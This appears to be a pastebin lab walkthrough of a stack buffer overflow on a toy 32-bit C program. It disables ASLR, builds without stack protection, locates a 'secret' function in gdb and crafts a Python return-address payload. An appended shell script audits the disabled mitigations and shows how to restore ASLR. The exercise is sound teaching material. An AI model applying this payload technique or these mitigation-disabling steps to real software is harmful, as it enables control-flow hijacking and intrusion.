boa

a guest
Mar 19th, 2019
sudo sysctl -w kernel.randomize_va_space=0

touch main.c

gedit main.c

getconf LONG_BIT

gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=2 main.c -o boa

./boa

[give inputs]

gdb boa

list

b 12

disass main

[target mem location after call function 0x0804846b]

run

[give inputs]

x/20x $esp

quit

gdb boa

disass secret

[0x0804843b] starting address of secret

[Open another terminal]
python -c 'print "a"*8+"\x3b\x84\x04\x08"'

python -c 'print "a"*8+"\x3b\x84\x04\x08"' > input

cat input
[Done for 2nd terminal]
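
A check for the lab machine, added here and not part of the original paste: it reports which mitigations the sysctl step and the gcc build line above switch off, so both can be restored after the exercise. The function names are made up for this example, and the flag list goes beyond the page's `-fno-stack-protector` to other common gcc hardening opt-outs.

```shell
#!/bin/sh
# Added example, not part of the paste. Function names are made up here.

# Meaning of a kernel.randomize_va_space value (step 1 sets it to 0).
aslr_label() {
    case "$1" in
        0) echo "disabled" ;;
        1) echo "partial" ;;   # stack, mmap base and VDSO randomized, brk heap not
        2) echo "full" ;;      # usual distribution default
        *) echo "unknown" ;;
    esac
}

# Current ASLR state of this host, or "unknown" where /proc is unavailable.
current_aslr() {
    f=/proc/sys/kernel/randomize_va_space
    if [ -r "$f" ]; then aslr_label "$(cat "$f")"; else echo "unknown"; fi
}

# Print one finding per hardening opt-out found in a gcc command line.
# Runs in a subshell so set -f and the loop variables stay local.
audit_build_flags() (
    set -f    # split the command line on spaces without glob expansion
    prev=""
    for word in $1; do
        case "$word" in
            -fno-stack-protector)                  echo "stack-protector-off" ;;
            -no-pie|-fno-pie|-fno-PIE)             echo "pie-off" ;;
            -D_FORTIFY_SOURCE=0|-U_FORTIFY_SOURCE) echo "fortify-off" ;;
            -Wl,-z,execstack)                      echo "nx-off" ;;
            execstack) if [ "$prev" = "-z" ]; then echo "nx-off"; fi ;;
        esac
        prev=$word
    done
)

# Build line copied from the steps above.
BUILD='gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=2 main.c -o boa'
echo "build opt-outs: $(audit_build_flags "$BUILD" | tr '\n' ' ')"
echo "ASLR on this host: $(current_aslr)"
# sysctl -w lasts only until reboot; to restore full ASLR earlier:
#   sudo sysctl -w kernel.randomize_va_space=2
```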